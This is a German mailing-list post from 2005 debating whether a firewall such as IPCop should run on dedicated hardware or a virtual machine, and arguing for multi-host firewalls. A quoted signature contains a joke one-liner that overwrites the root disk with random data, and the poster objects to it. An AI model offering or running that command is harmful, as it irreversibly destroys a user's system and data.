Am Mittwoch, 20. April 2005 00:08 schrieb Chrissie Brown:
> On 2005-04-19, Carsten Ferdian <[EMAIL PROTECTED]> wrote:
> > benutze schon sehr lang den IpCop und finde das man schon ne eigene
> > Maschine nutzen sollte um ein oder mehrere Netze zu sch�tzen. Daher
> > is meine Meinung zu ner virtuellen Umgebung f�r ne Firewall nicht
> > gerade so egeisternd. Man sollte nicht am falschen Ende sparen und
> > daher ruhig nen eigenes "echtes" System aufsetzen.
>
> Wie kommst du darauf? Wenn jemand das Zeug hackt, ist es doch grad
> egal ob in der virtuellen oder der "echten" Maschine.
Eine vern�nftige Firewall besteht aus mehr als einem Host.
Ist der erste gehackt, gibt es Alarmstufe "Orange", FW2 macht die
Schotten dicht und die FW1 wird erneuert.
Die alte FW1 wird dann analysiert (Wer hat sich wie welchen Zugriff
verschafft?).
Alles andere ist zumindest f�r ein Firmennetz mit sensiblen/wichtigen
Daten nichts anderes als Augenwischerei.
> --
> Chrissie
>
> su -c "dd if=/dev/urandom of=`mount |grep 'on / ' |awk '{print
> $1;}'`"
... und wenn das mal jemand ausprobiert! Lustig find ich es nicht.
--
Gru�
����������������MaxX
Bitte beachten: Diese Mailadresse nimmt nur Listenmails entgegen.
F�r PM bitte den Empf�nger gegen den Namen in der Sig tauschen.
